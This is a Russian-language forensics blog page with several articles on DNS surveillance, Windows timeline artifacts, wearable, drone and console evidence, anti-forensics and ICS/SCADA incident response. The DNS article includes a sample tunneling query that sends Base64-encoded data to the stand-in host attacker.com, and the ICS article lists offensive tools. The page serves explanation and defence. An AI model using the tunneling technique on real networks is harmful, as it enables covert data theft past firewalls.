Логотип

Блог

Экспертные статьи о Форензике

Слежка через DNS: как доменный сервер выдаёт все твои секреты

Вы можете обмазаться VPN-ами, заклеить веб-камеру синей изолентой и использовать HTTPS везде, где только можно. Но если вы оставили настройки DNS по умолчанию — поздравляю, вы ходите по улице голым, прикрываясь прозрачным полиэтиленом.
DNS (Domain Name System) — это телефонная книга интернета. Вы вводите  google.com , а DNS-сервер говорит вашему компьютеру: «Иди по адресу 142.250.x.x». И вот в чем ирония: пока содержание вашего разговора (HTTPS) зашифровано, то, кому вы звоните, видно всем, кто стоит на раздаче.
Давайте разберем, как этот древний протокол превращает вашу цифровую жизнь в открытую книгу для провайдера, хакеров и таких специалистов, как я.

Проблема 53-го порта: Болтун — находка для шпиона
Классический DNS работает по протоколу UDP на 53-м порту. И работает он в открытом виде (plaintext). Это значит, что любой узел между вами и DNS-сервером (ваш роутер, провайдер, админ корпоративной сети, товарищ майор на СОРМ-оборудовании) видит каждый ваш запрос.
Что они видят?


Они не видят, какое именно видео вы смотрите на YouTube. Но они видят:
1.  youtube.com  — 22:00 (ага, смотрит видосики).
2.  api.tinder.com  — 23:15 (ищет пару на ночь).
3.  jobsearch.ru  — 09:30 (собирается валить с работы).
4.  depression-help.org  — 03:00 (бессонница и проблемы).
Для форензика DNS-логи — это не просто список сайтов. Это паттерн поведения. Я могу составить ваш психологический портрет, просто глядя на домены, к которым обращается ваш смартфон, пока вы спите.

Умные устройства — тупые стукачи
Вы думаете, что контролируете свои запросы? Как бы не так. Ваши устройства болтают без умолку.
Умный холодильник стучится на серверы Samsung, китайская камера видеонаблюдения шлет “приветы” на непонятные IP в облаке Alibaba, а Windows тихо сливает телеметрию.
В ходе расследований мы часто ловим преступников не на том, что они гуглили «как спрятать труп», а на фоновом шуме. Например, телефон автоматически обновил погоду в конкретной локации или синхронизировал время через NTP-сервер, оставив след в DNS-логах провайдера. Алиби рассыпается в пыль.

Passive DNS: Машина времени для OSINT
Если вы думаете, что удалив историю браузера, вы стерли следы, у меня для вас плохие новости. Существует такая вещь, как Passive DNS.
Это огромные базы данных, которые собирают исторические связки “Домен — IP-адрес”.
Для OSINT-специалиста это золотая жила.
• Хотите узнать, на каких еще доменах висел этот подозрительный IP год назад? Passive DNS.
• Нужно найти все поддомены корпорации, чтобы найти забытую админку? Passive DNS.
• Нужно связать два, казалось бы, разных сайта мошенников? Мы смотрим историю смены их NS-записей (Name Server) и видим, что их администрировал один и тот же e-mail.

DNS-туннелирование: Как вынести данные под носом у фаервола
А теперь про высший пилотаж. DNS можно использовать не только для резолвинга имен, но и для передачи данных. Это называется DNS Tunneling.
Представьте, что вы сидите в корпоративной сети, где закрыто всё, кроме 53-го порта (потому что без DNS интернет не работает). Злоумышленник (или хитрый инсайдер) может передавать украденные файлы, кодируя их в поддомены.
Выглядит это так:

Запрос:  V2VyeVNlY3JldERhdGE=.attacker.com 
 Ответ:  IP address… 
На сервере злоумышленника  attacker.com  специальный скрипт ловит эти запросы, берет кусок  V2VyeVNlY3JldERhdGE= , декодирует его из Base64 и собирает файл обратно. Для обычного админа это выглядит как куча странных запросов к одному домену. Для меня — как красный флаг размером с небоскреб.

Как защищаются (и почему это бесит форензиков)
Чтобы закрыть эту дыру, придумали DoH (DNS over HTTPS) и DoT (DNS over TLS).
Эти технологии заворачивают ваши DNS-запросы в шифрованный туннель. Провайдер видит только кашу из байтов, летящую на 443 порт (HTTPS).
• Плюс: Провайдер не может продавать вашу историю посещений рекламщикам.
• Минус: Системные администраторы и безопасники теряют контроль над сетью. Вредоносное ПО тоже полюбило DoH, чтобы скрывать свои коммуникации с командными центрами.

Итог
DNS — это ахиллесова пята интернета. Это старый, болтливый протокол, на котором держится вся сеть.
Если вы не настроили защищенный DNS (на роутере или в браузере), считайте, что вы кричите о своих планах в мегафон посреди площади. А я, провайдер и хакеры стоим рядом с блокнотиками и записываем.

Слежка через DNS: как доменный сервер выдаёт все твои секреты

Искусство таймлайна: собираем цифровой день подозреваемого по секундам

Люди любят врать. Свидетели путают время, подозреваемые придумывают алиби про поход к бабушке, а камеры наблюдения вечно смотрят не в ту сторону. Но есть один свидетель, который (почти) никогда не врет: файловая система.
Таймлайн — это святой грааль форензики. Это способ взять кучу разрозненного мусора — логи, метаданные, кэши — и выстроить их в одну жесткую линию, которая пригвоздит вашего «клиента» к месту преступления точнее, чем отпечатки пальцев. Сегодня я расскажу, как мы собираем этот цифровой пазл, и почему ваш компьютер знает о вас больше, чем вы сами.

Фундамент: MAC-времена и почему им нельзя верить слепо
Начнем с базы, на которой сыпятся новички. У каждого файла есть MAC-атрибуты:
• Modified (Изменен)
• Accessed (Доступен)
• Created (Создан)
• Born (В некоторых системах, дата “рождения” файла)

Казалось бы, бери дату изменения файла с ворованным отчетом — и дело в шляпе. Ага, разбежались. Опытный преступник (или просто везучий идиот) может изменить системное время или использовать утилиты для “timestomping” (подделки временных меток).
Поэтому, если вы строите таймлайн только на атрибутах файлов, вы — не эксперт, а гадалка на кофейной гуще. Настоящая магия начинается, когда мы лезем глубже.

LNK-файлы и Jump Lists: Предатели в вашей панели задач
Вы открыли флешку, скопировали документы, выдернули её и выбросили в реку. Думаете, вы чисты? Windows так не думает.
Каждый раз, когда вы открываете файл, система заботливо создает LNK-файл (ярлык) в скрытых папках, чтобы вам было удобно открыть его снова. Эти маленькие гаденыши хранят:
• Путь к файлу (даже если он был на той самой утопленной флешке).
• Дату первого и последнего открытия.
• Серийный номер тома (Volume Serial Number).
Jump Lists (списки переходов в меню “Пуск”) работают еще жестче, сохраняя историю ваших действий по приложениям. Сопоставив это с системным временем, мы видим не просто “файл был создан”, а “файл был открыт пользователем X через Word в 14:03:12”.

Реестр и Shellbags: Память слона
Реестр Windows — это кладбище ваших секретов. Одной из самых вкусных находок для меня всегда были Shellbags.
Shellbags запоминают настройки отображения папок (размер окна, вид значков и т.д.). Зачем это нужно системе? Для удобства. Зачем это нужно мне? Потому что даже если вы удалили папку с компроматом, запись в Shellbag останется. Она скажет мне: “В 10:15 утра этот парень заходил в папку ‘Схемыотмыва’, хотя сейчас её на диске нет”.

Prefetch и Shimcache: Доказательство запуска
“Я не запускал эту хакерскую утилиту, она сама скачалась вирусом!” — классическая отмазка.
Тут на сцену выходит Prefetch. Windows следит за тем, какие программы вы запускаете, чтобы в следующий раз они грузились быстрее. Файл  .pf  расскажет мне:
1. Имя исполняемого файла.
2. Сколько раз его запускали.
3. Дату и время последнего запуска (с точностью до секунды).
А если вы попытались почистить Prefetch (что уже само по себе подозрительно), у нас есть Shimcache (или AppCompatCache). Это механизм совместимости приложений, который хранит данные о запущенных файлах даже после перезагрузки. Он помнит всё, даже если файл давно стерт с лица земли.

Браузер и Event Logs: Финальный штрих
Теперь накладываем сверху вишенку на торт.
• Браузерная история: Кэш, куки, история загрузок. Мы видим, что в 14:00 вы гуглили “как скрыть следы удаления файлов”, а в 14:05 скачали чистильщик.
• Event Logs (Журналы событий): Security Log покажет моменты входа в систему, смены паролей и повышения привилегий. System Log покажет моменты подключения USB-устройств.

Как это выглядит в итоге?
Мы берем инструмент (например, Plaso/Log2Timeline или Magnet AXIOM), скармливаем ему образ диска, и он выплевывает гигантскую таблицу. А дальше начинается работа мозга.
Картина маслом:
• 13:55:00 — Вход в систему (Event Log).
• 13:57:12 — Подключение USB-накопителя “KINGSTON” (Registry/USBSTOR).
• 13:58:45 — Открытие папки “Конфиденциально” на диске D (Shellbags).
• 13:59:10 — Открытие файла “База_клиентов.xlsx” (LNK-файл + JumpList).
• 14:01:05 — Копирование файла (создание LNK на USB-накопителе).
• 14:02:00 — Извлечение USB (Event Log).
• 14:05:00 — Гугл-запрос “билет в Мексику” (Browser History).
Вот и всё. Алиби рассыпалось, адвокат плачет, а мы идем пить кофе. Цифра не врет, врут только люди, которые не знают, как она работает.

P.S. Не пытайтесь использовать CCleaner или “вайперы”, чтобы скрыть следы. Для эксперта сам факт использования таких утилит в критический момент — это как неоновая вывеска “Я ВИНОВЕН”. Лучшая защита — не делать глупостей.

Искусство таймлайна: собираем цифровой день подозреваемого по секундам

Алиби по пульсу: что могут рассказать фитнес-трекеры и умные часы

В мире цифровой криминалистики мы привыкли копаться в жестких дисках и логах серверов. Но в последние годы самый интересный источник данных перекочевал прямо на тело человека. Фитнес-браслеты и умные часы — это не просто гаджеты. Это персональные «чёрные ящики», которые с пугающей точностью записывают историю жизни своего владельца. И когда эта история расходится с официальными показаниями, начинается самое интересное.

Ваш личный цифровой свидетель
Современные носимые устройства собирают массив данных, который для криминалиста — просто золотая жила. Вот лишь малая часть того, что они могут рассказать:
• Пульс. Сердце не обманешь. Учащенное сердцебиение в момент, когда вы якобы «крепко спали», может указывать на стресс, панику или интенсивную физическую нагрузку. Например, на борьбу или бегство с места преступления.
• GPS-треки. Самое очевидное. Ваше алиби «я весь вечер был дома» мгновенно рассыпается, если трекер показывает, что в это время вы находились по адресу, где произошло преступление. Точность современных чипов позволяет определить местоположение с погрешностью в несколько метров.
• Шаги и активность. Устройство скрупулезно считает каждый шаг. Если подозреваемый утверждает, что был ранен и не мог передвигаться, а его часы зафиксировали 5000 шагов после предполагаемого ранения, — у его адвоката будут проблемы. Данные акселерометра могут даже помочь определить характер движений: шел человек, бежал или ехал в машине.
• Фазы сна. Заявление «я спал как младенец» легко проверяется. Трекер покажет не только время засыпания и пробуждения, но и фазы глубокого и быстрого сна. Отсутствие сна в указанное время — жирный минус к достоверности показаний.

Как браслет ломает алиби: реальные примеры
Это не теория. Суды по всему миру всё чаще принимают данные с носимых устройств в качестве доказательств. Классический случай — дело Ричарда Дабейта, который утверждал, что его жену убил грабитель, а его самого связал и пытал. Его фитнес-браслет рассказал совсем другую историю. Данные показали, что он прошел более 1200 шагов по дому в то время, когда, по его словам, был связан. А данные с браслета его убитой жены зафиксировали её передвижения по дому уже после того времени, как она, по версии мужа, была мертва. Итог — обвинение в убийстве.
Другой сценарий: жертва нападения. Её часы могут зафиксировать момент прекращения движения и резкое падение пульса, что помогает установить точное время смерти. Или, наоборот, GPS-трек жертвы может привести следствие прямо к месту, где спрятано тело.

Не всё так просто, но…
Конечно, защита всегда пытается оспорить такие улики. «Часы носил кто-то другой», «произошел сбой в данных», «пульс подскочил от просмотра фильма ужасов». Поэтому данные с трекера редко бывают единственным доказательством. Но когда они ложатся в одну канву с другими уликами — данными с камер наблюдения, биллингом телефона, показаниями свидетелей — они создают железобетонную картину произошедшего.
Получить эти данные — отдельная задача. Это требует официальных запросов к производителям вроде Apple, Google или Garmin, которые хранят резервные копии в облаке. Но когда на кону раскрытие тяжкого преступления, мы получаем необходимые ордеры.
Так что в следующий раз, когда ваш браслет поздравит вас с достижением цели по шагам, помните: он не только ваш тренер, но и потенциальный молчаливый свидетель. И подкупить его не получится.

Алиби по пульсу: что могут рассказать фитнес-трекеры и умные часы

Анти-форензика: как преступники прячут следы (и как мы их всё равно находим)

Каждый раз, когда в новостях говорят про очередного кибер-гения, который «не оставил следов», я усмехаюсь. Следы есть всегда. Вопрос лишь в том, насколько глубоко они зарыты и хватит ли у специалиста терпения, инструментов и чая, чтобы до них докопаться. Анти-форензика — это не магия, а набор методов, направленных на одно: помешать нам, криминалистам, делать свою работу.

Арсенал цифрового призрака: основные методы
Преступники, от мелких мошенников до организованных групп, используют несколько классических приемов, чтобы замести следы.

  1. Уничтожение данных (или они так думают)
    Это самый прямолинейный подход. Наивные души думают, что перетащить файл в корзину и очистить её — значит уничтожить данные. Детский сад. Продвинутые используют специальные утилиты (вайперы), которые многократно перезаписывают секторы диска случайными данными. Самые отчаянные — берут в руки дрель или молоток.
    • Как мы их находим: Для нас «удалено» — это просто «временно невидимо». Файловая система лишь стирает указатель на файл, а сами данные лежат в «неразмеченной области» диска, пока их не перезапишут. Мы вытаскиваем информацию из теневых копий, файлов подкачки и даже из оперативной памяти (привет, cold boot attack). Даже после «полной» перезаписи на старых HDD остаются остаточные магнитные следы. А если носитель физически уничтожен, мы можем поработать с уцелевшими частями чипов памяти. Это ювелирная работа, но она того стоит.
  2. Шифрование и стеганография
    Тут уже играют ребята посерьезнее. Полное шифрование диска (BitLocker, VeraCrypt) превращает накопитель в бесполезный «кирпич» без ключа. Стеганография — это искусство прятать данные внутри других файлов: например, зашить секретный документ в безобидную картинку с котиком.
    • Как мы их находим: Шифрование — крепкий орешек, но не неприступная крепость. Ключи шифрования или пароли часто хранятся в оперативной памяти, в файлах гибернации или временных файлах. Мы анализируем дампы памяти, ищем пароли в связанных утечках данных или просто применяем старый добрый брутфорс, если пароль оказался слишком простым. Со стеганографией помогают специальные алгоритмы (стегоанализ), которые ищут статистические аномалии в файлах. Ваш котик внезапно весит в два раза больше нормы? Поздравляю, у нас есть повод присмотреться к нему повнимательнее.
  3. Анонимизация и запутывание следов
    VPN, прокси, цепочки серверов, Tor — всё это создаёт иллюзию анонимности. Преступник думает, что его IP-адрес надежно скрыт за семью печатями где-нибудь на Каймановых островах. Плюс, они пытаются чистить или подделывать логи на скомпрометированных системах.
    • Как мы их находим: Анонимность в сети — миф. VPN-сервисы (особенно бесплатные) ведут логи, даже если клянутся в обратном. Цепочка прокси рвется в самом слабом звене. Tor не защищает от анализа трафика на входе и выходе из сети. Наша задача — OSINT. Мы собираем цифровой мусор: никнеймы, email-адреса, уникальные идентификаторы ПО, стиль общения на форумах. Поверьте, один и тот же ник, использованный 10 лет назад на форуме любителей кактусов и вчера в даркнете, — это отличная зацепка. Мы ищем не IP-адрес, мы ищем человека, а люди всегда совершают ошибки.
    Вечная гонка
    Анти-форензика — это постоянная гонка вооружений. Они придумывают новые способы спрятаться, мы — новые способы их найти. Они используют облака, мы учимся работать с облачной криминалистикой. Они переходят на безлоговые мессенджеры, мы анализируем сетевой трафик и метаданные.
    Главный союзник криминалиста — человеческий фактор. Лень, невнимательность, самоуверенность и ошибки. Кто-то забудет включить VPN. Кто-то использует один и тот же пароль везде. А кто-то просто не знает, что его смартфон пишет геотеги на каждое фото.
    Так что пусть прячут. Чем сложнее загадка, тем слаще вкус победы, когда ты находишь ту самую «иголку в стоге сена».
    И да, последнее. Не пытайтесь это повторить, чтобы «проверить систему». Поверьте мне, это всегда заканчивается плохо для экспериментатора. Я серьезно.
Анти-форензика: как преступники прячут следы (и как мы их всё равно находим)

Форензика дронов: вычисляем пилота по следам в небе

Думал, твой дрон — это просто летающая камера для красивых кадров с высоты птичьего полета? Ошибаешься. Это летающий свидетель, который пишет досье на своего хозяина. Каждый его взлет, каждый маневр, каждый снятый кадр — это цифровая запись, которая не умеет лгать. И когда такой «свидетель» попадает не в те руки (или, скажем, в мои), он рассказывает удивительные истории.

Для контрабандистов, шпионов, сталкеров и прочих любителей нарушать закон дрон кажется идеальным инструментом: анонимным и дистанционным. Но это иллюзия. Для специалиста по форензике этот аппарат — открытая книга, написанная GPS-координатами и временными метками.

Что хранит в себе «черный ящик» дрона
Современный коммерческий дрон, особенно от гигантов вроде DJI, — это настоящий кладезь данных. Он собирает информацию не только о своем полете, но и о том, кто им управляет.

• Полетные логи. Это святой Грааль форензики дронов. Каждая секунда полета записывается: точные GPS-координаты, высота, скорость, направление движения, состояние батареи. Все это складывается в подробную карту маршрута. Часто логи хранятся и на самом дроне (на SD-карте или во внутренней памяти), и в приложении на смартфоне пилота.
• Точка «Дом» (Home Point). При взлете дрон записывает свои координаты как точку возврата. В 99% случаев это место, где стоит пилот. Забыл сменить эту точку вручную? Поздравляю, ты только что сдал свое местоположение с точностью до метра.
• Медиафайлы и метаданные. Фото и видео — самое очевидное. Но куда интереснее их метаданные (EXIF). В них зашиты не только время и GPS-координаты съемки, но и уникальный серийный номер дрона. Этот номер — как отпечаток пальца.
• Данные со смартфона/пульта. Приложение для управления дроном (вроде DJI GO) — это сокровищница. Оно кеширует полетные логи, видеопотоки, а главное — хранит данные аккаунта пилота: email, никнейм. Иногда даже его реальное имя и фото.
• Сетевая информация. Логи подключений к Wi-Fi сетям, MAC-адреса контроллера и смартфона. Все это помогает связать воедино всю цепочку: дрон — пульт — смартфон — владелец.
• Серийные номера. У дрона, пульта и даже у батарей есть уникальные серийные номера. По этим номерам через производителя (при наличии ордера, конечно) можно выйти на первоначального покупателя.

Как мы вычисляем пилота: от теории к практике
Представь, что мы нашли дрон, который шпионил за промышленным объектом. Как мы найдем его хозяина?
1. Физический анализ. Первым делом извлекаем SD-карту и внутреннюю память. Специализированный софт, например, от Cellebrite или MSAB, вытаскивает оттуда все: удаленные и целые фото, видео, полетные логи в формате .DAT или .TXT.
2. Анализ логов. Прогоняем логи через программы вроде CsvView или Airdata UAV. Мы видим весь маршрут, но самое главное — точку взлета. Часто этого уже достаточно. Выезжаем на место и ищем «пилота», который нервно оглядывается в поисках своей пропажи.
3. Крутим цепочку. Нашли серийный номер в метаданных фото. Отправляем запрос производителю. Получаем данные об аккаунте, к которому привязан дрон. Через email или никнейм начинаем старый добрый OSINT: ищем соцсети, форумы, доски объявлений. Очень часто пилоты хвастаются своими полетами на YouTube или в Instagram, используя тот же никнейм.
4. Смотрим видео. Самая частая ошибка дилетантов — они не прекращают запись вовремя. На последних кадрах видео часто можно увидеть самого пилота, его машину (с номерами!), его дом или просто уникальные приметы местности, где он приземлил дрон.

В итоге, казалось бы, анонимная операция превращается в полный провал. Каждый шаг пилота документируется и ждет своего часа.

Так что, когда в следующий раз запустишь свою «птичку» в небо, помни: она не только смотрит на мир, она смотрит и на тебя. И записывает. Всегда. И не думай, что кнопка «форматировать» тебя спасет. Удаленные данные — моя любимая часть работы.
Я серьезно.

Форензика дронов: вычисляем пилота по следам в небе

PlayStation как главный свидетель: что расскажет игровая консоль о своём владельце

Думаешь, твой геймпад — это просто кусок пластика для побега от реальности? Как мило. Эта маленькая коробка под твоим телевизором — самый честный свидетель, которого ты когда-либо встретишь. Она не врет, не забывает и уж точно не берет взяток. Она просто пишет. Пишет всё. И когда дело доходит до разбора полетов, будь то банальная бытовуха или что-то посерьезнее, именно PlayStation может рассказать историю, которую её владелец очень хотел бы оставить при себе.

Так что садись поудобнее. Сейчас я покажу тебе, как твое главное развлечение может стать твоим главным обвинителем.

Цифровой дневник, который ты не ведешь
Каждый раз, когда ты включаешь консоль, ты оставляешь след. Для обычного пользователя это просто данные, но для специалиста по форензике — это целая карта жизни человека. Вот лишь малая часть того, что хранит в своей памяти твоя верная игровая подруга:

• Личные данные. Твой PSN ID, настоящее имя (если ты был настолько неосторожен, чтобы его указать), адрес электронной почты. Это уже золотая жила для любого OSINT-исследования.
• Социальные связи. Список друзей, история переписок в чатах, записи голосовых сообщений. Кто твои «братья по оружию»? Может, и подельники? Анализ круга общения может быстро вывести на интересных личностей.
• Игровая активность. Во что играл, когда, как долго. Алиби на 3 часа ночи вторника? Консоль говорит, что ты в это время в сотый раз пытался пройти сложного босса. Снова и снова. Временные метки полученных трофеев — это железное доказательство твоей активности.
• Финансовые следы. История покупок в PS Store, данные привязанных банковских карт. Время и дата транзакции могут быть весьма красноречивы и помочь выстроить хронологию событий.
• Сетевые логи. IP-адреса, с которых осуществлялся вход, MAC-адрес консоли, история подключений к Wi-Fi сетям (включая их названия). Привет, геолокация. Мы вполне можем выяснить, где физически находилась консоль в определенный момент времени.
• Медиафайлы. Скриншоты и записанные видеоклипы. Иногда один случайный скриншот с внутриигровым чатом или никнеймом другого игрока может рассказать больше, чем долгий допрос.
• Веб-серфинг. Да, встроенный браузер тоже оставляет следы. Думал, никто не узнает, что ты гуглил «как незаметно избавиться от…»? Подумай еще раз.

Вскрываем черный ящик
Получить эти данные — не то же самое, что флешку вставить. Sony, мягко говоря, не в восторге, когда кто-то копается в их железе. Консоли защищены шифрованием и проприетарными файловыми системами. Но для упрямых парней из форензики это просто очередной интересный вызов, а не преграда.

Процесс обычно сводится к нескольким путям:

1. Физический дамп. Мы снимаем жесткий диск и создаем его полную побитовую копию. Это как снять слепок с места преступления, только в цифровом мире. Дальше начинается самое увлекательное — расшифровка и анализ этого хаоса данных с помощью специализированного софта.
2. Логический анализ. Если есть доступ к работающей консоли (и, хе-хе, паролю), можно извлечь данные через её интерфейс или специальные утилиты. Менее грязно, но и менее полно.
3. Анализ сети. Не стоит забывать и про сетевое оборудование. Роутер, к которому подключена консоль, тоже очень болтлив и может выдать всю историю её сетевой активности.

PlayStation в зале суда
Чтобы было понятнее, вот пара гипотетических сценок из жизни:

• Дело о «крепком сне». Подозреваемый клянётся, что в ночь совершения преступления спал как младенec. Его PlayStation 5 показывает, что он до 4 утра зарабатывал платиновый трофей в какой-нибудь Cyberpunk 2077. Неувязочка.
• Поиск сообщников. Группа лиц совершает правонарушение. Кто был с ними? Анализ голосового чата с консоли одного из них выводит на всю компанию, которая как раз обсуждала «веселые планы» на ту самую ночь.
• Разрушенное алиби. Человек утверждает, что был дома в другом городе. Логи IP-адресов его консоли показывают подключение из квартиры, расположенной по соседству с местом преступления. Game over.

Так что в следующий раз, когда будешь рубиться в онлайн-шутер, помни: твоя консоль — не просто игровой девайс. Это твой личный биограф, хронометрист и, потенциально, свидетель обвинения. Она знает о тебе больше, чем твоя мама, и у неё идеальная память.

И да, прежде чем ты побежишь форматировать свой HDD: всё, что здесь написано, — для общего развития. Попытки применить это самостоятельно — прямой путь к нарушению закона и, скорее всего, к превращению твоей дорогой консоли в бесполезный кирпич. Не делай так. Я серьезно.

PlayStation как главный свидетель: что расскажет игровая консоль о своём владельце

Кибер-Апокалипсис на заводе: форензика промышленных систем (ICS/SCADA)

Вы думали, что форензика — это только про изъятые ноутбуки из офисов и взломанные почтовые ящики? Какая наивность. Добро пожаловать в мир, где один неверный бит может остановить целый завод, обесточить город или превратить химкомбинат в локальный Чернобыль. Промышленные системы управления (ICS/SCADA) — это та самая критическая инфраструктура, о которой все говорят, когда упоминают кибервойны.

Сегодня я расскажу вам, как расследовать инциденты в мире, где Windows XP считается современной ОС, а “перезагрузка” может стоить миллионы долларов. Пристегнитесь — будет технично, страшно и местами абсурдно.

Представьте: 3 часа ночи, вас поднимают с кровати звонком от директора нефтеперерабатывающего завода. Голос дрожит. На заводе встала линия управления турбинами. Датчики показывают бред, задвижки не реагируют на команды, операторы в панике тыкают кнопки аварийной остановки. Убытки идут миллионами в час. Причина? Неизвестна. Может, отказ оборудования. А может, кто-то решил поиграть в Stuxnet 2.0.
Добро пожаловать в промышленную форензику. Здесь нет красивых GUI-интерфейсов. Здесь есть ржавые шкафы с контроллерами, проприетарные протоколы связи из 90-х и системные администраторы, которые боятся слова “обновление” больше, чем апокалипсиса.

Что такое ICS/SCADA и почему это страшно
ICS (Industrial Control Systems) — собирательный термин для всех систем управления промышленными процессами. SCADA (Supervisory Control and Data Acquisition) — подмножество ICS, отвечающее за диспетчерское управление и сбор данных. Проще говоря: это мозг завода, электростанции, водоканала или метрополитена.
Эти системы управляют:
• Физическими процессами (давление, температура, скорость)
• Оборудованием (насосы, задвижки, конвейеры)
• Безопасностью (аварийные остановы, защитные блокировки)

Страшно становится, когда понимаешь три вещи:
1. Многие из этих систем были спроектированы до эпохи интернета и никогда не предполагали подключения к внешним сетям. Концепция “безопасности” была примерно такой: “Если злоумышленник физически не может попасть в цех, то и взломать нечего”.
2. Обновление ПО на критическом оборудовании — сродни операции на открытом сердце. Любая ошибка может привести к простою производства, а простой стоит денег. Поэтому многие системы работают на Windows 2000, и никто не планирует их трогать “пока работает”.
3. Современные заводы подключены к корпоративным сетям для удаленного мониторинга и управления. И вот тут начинается веселье.

Особенности промышленной форензики
Если в классической форензике вы работаете с компьютерами и серверами, то здесь ваша песочница — это:
• ПЛК (программируемые логические контроллеры) — железные коробки, которые управляют физикой
• HMI (человеко-машинные интерфейсы) — экраны, на которых операторы видят картинку процесса
• Историаны (системы сбора данных) — базы данных с телеметрией за годы работы
• Инженерные станции — компьютеры, с которых программируются контроллеры
• Сетевое оборудование — коммутаторы, маршрутизаторы, часто без логирования

Основные проблемы:
Невозможность остановить систему для изъятия. Вы не можете просто выключить контроллер управления электростанцией и унести его в лабораторию. Завод должен работать. Форензика проводится “на живую”, что усложняет сохранение доказательной базы.
Проприетарные протоколы и форматы. Modbus, DNP3, Profinet, OPC — это не HTTP с JSON. Документация закрыта, анализаторы трафика из коробки не понимают половину команд, а логи (если они вообще есть) записываются в бинарных форматах.
Отсутствие логирования. Многие ПЛК не ведут подробных логов. Они созданы для управления, а не для аудита. Максимум что вы найдете — последние несколько событий в энергонезависимой памяти.
Временные метки — это квест. Синхронизация времени на промышленных устройствах часто отсутствует. Один контроллер думает, что сейчас 2019 год, другой — что 2025-й. Построить временную шкалу атаки — отдельное искусство.

Пошаговый план расследования
Итак, вас вызвали на завод. Что делать?
Изоляция и фиксация состояния. Первым делом — отключить пострадавшую систему от внешних сетей (если это возможно без остановки производства). Зафиксировать текущее состояние: снять образы памяти HMI-станций, сохранить конфигурации ПЛК, скопировать логи историанов. Работаем быстро — данные в оперативной памяти летучи.
Сбор сетевого трафика. Установите сниффер (тот же tcpdump или Wireshark) на зеркальном порту промышленной сети. Захватывайте весь трафик между ПЛК, HMI и инженерными станциями. Промышленные протоколы часто передаются в открытом виде — это ваш шанс увидеть, что творилось во время инцидента.
Анализ конфигураций ПЛК. С помощью инженерного ПО (Siemens Step 7, Rockwell Studio 5000, Schneider Unity Pro) скачайте текущую программу из контроллера и сравните её с эталонной версией. Если кто-то влез в логику — изменения будут видны. Ищите неавторизованные блоки кода, странные таймеры, подозрительные условия.
Логи, логи, логи. Соберите всё, что можно:
• Логи Windows с HMI-станций и инженерных компьютеров
• Логи SIEM, если система мониторинга безопасности установлена
• Исторические данные с SCADA-серверов (графики параметров до и во время инцидента)
• Логи межсетевых экранов и маршрутизаторов
Временная шкала атаки. Используя собранные данные, постройте последовательность событий. Когда начались аномалии? Какие команды отправлялись на ПЛК? Были ли изменения в конфигурации? Какие учетные записи использовались?
Поиск артефактов вредоноса. Если подозрение на целевую атаку — ищите специализированные зловреды (типа Industroyer, Triton, BlackEnergy). Проверяйте процессы, запланированные задачи, библиотеки DLL, автозагрузки. Промышленные вредоносы часто маскируются под легитимное ПО и используют штатные инструменты для управления ПЛК.
Инструментарий промышленного форензика
• Wireshark с плагинами для промышленных протоколов (Modbus, DNP3, S7comm)
• Volatility — для анализа дампов памяти Windows-систем
• ICS-specific tools: PLCinject, Metasploit с модулями для SCADA, S7-PCAP-Parser
• YARA-правила для поиска известных ICS-malware
• FTK Imager или dd для создания образов дисков инженерных станций
• NetworkMiner или Zeek для парсинга сетевого трафика и реконструкции файлов

Реальные кейсы
Stuxnet (2010). Классика жанра. Червь, созданный для атаки на иранскую ядерную программу. Проник через флешку, распространился по сети, нашел специфичные модели ПЛК Siemens, подменил их программу и заставил центрифуги вращаться с неправильной скоростью, пока не разрушились. При этом операторы видели на экранах нормальные показания — вредонос подменял данные.
Industroyer/CrashOverride (2016). Атака на энергосистему Украины. Зловред умел работать с протоколами IEC 60870-5-101/104, использовался для отключения подстанций. Результат — блэкаут в Киеве.
Triton (2017). Самый страшный. Атака на систему безопасности завода в Саудовской Аравии. Злоумышленники пытались отключить аварийную защиту, чтобы довести процесс до катастрофы. К счастью, вредонос сработал криво и вызвал аварийную остановку вместо взрыва.

Выводы циника
Промышленная форензика — это страшный мир, где ставки измеряются не в терабайтах утекших личных данных, а в человеческих жизнях. Где злоумышленник может не просто украсть информацию, а физически разрушить оборудование или вызвать экологическую катастрофу.
И самое печальное — большинство промышленных объектов к этому не готовы. Безопасность там всё ещё строится по принципу “у нас же изолированная сеть” (спойлер: давно не изолированная), а форензик-готовность равна нулю. Логи не пишутся, резервные копии конфигураций не делаются, мониторинг аномалий отсутствует.

Так что если вы работаете на заводе и читаете это — начните хотя бы с базового логирования и резервирования конфигураций ПЛК. А если вы форензик, который решил погрузиться в ICS-тематику — добро пожаловать в клуб. Тут не будет скучно. Обещаю.

Кибер-Апокалипсис на заводе: форензика промышленных систем (ICS/SCADA)

Сетевой потрошитель: как вскрыть трафик и увидеть всё, что лезет в твой интернет и из него

А, классика. Захотелось заглянуть под капот своему интернету и посмотреть, кто там кому шепчет? Похвальное стремление. Большинство пользователей воспринимают интернет как магию: ввел адрес — получил котиков. А то, что в это время их умный чайник отправляет отчет о ваших чаепитиях на китайский сервер, — дело десятое.
Что ж, садитесь поудобнее. Сейчас я выдам вам базовый набор юного сетевого потрошителя. Будем вскрывать цифровые потроха вашего подключения. Но сначала — минутка занудства, без которой моя совесть (и адвокат) не будут спать спокойно.

Думаете, ваш роутер — это просто коробка с мигающими лампочками? Ошибаетесь. Это пограничный пункт, через который 24/7 идет контрабанда данных. Ваше приложение для погоды, смарт-телевизор, ноутбук, телефон — весь этот цифровой зоопарк постоянно что-то отправляет и получает. Обычно это легитимный трафик. А иногда — не очень. Иногда там прячется вредонос, который сливает ваши пароли, или хитрое приложение, которое торгует вашими данными.
Цель нашего вскрытия — не взлом соседа (за это есть статья 272 УК РФ, не советую проверять), а ревизия собственного хозяйства. Мы будем ловить и анализировать трафик исключительно в своей, домашней сети. Это как поставить камеру у себя в квартире, а не в чужой спальне. Поняли? Отлично, тогда поехали.

Арсенал для вскрытия
Забудьте про голливудские сказки со строчками зеленого кода на черном экране. Наши инструменты выглядят прозаичнее, но от этого не менее мощны.
• Wireshark. Это ваш швейцарский нож, микроскоп и скальпель в одном флаконе. Бесплатная программа, которая захватывает весь сетевой трафик, проходящий через ваш компьютер, и раскладывает его по полочкам. Она покажет вам каждый пакетик данных, его источник, назначение и содержимое (если оно не зашифровано, конечно).
• tcpdump. Для тех, кто презирает графические интерфейсы и любит суровую мощь командной строки. Это дедушка всех снифферов. Умеет всё то же, что и Wireshark, но управляется командами из консоли. Идеально для работы на удаленных серверах или старых роутерах, где нет экрана.
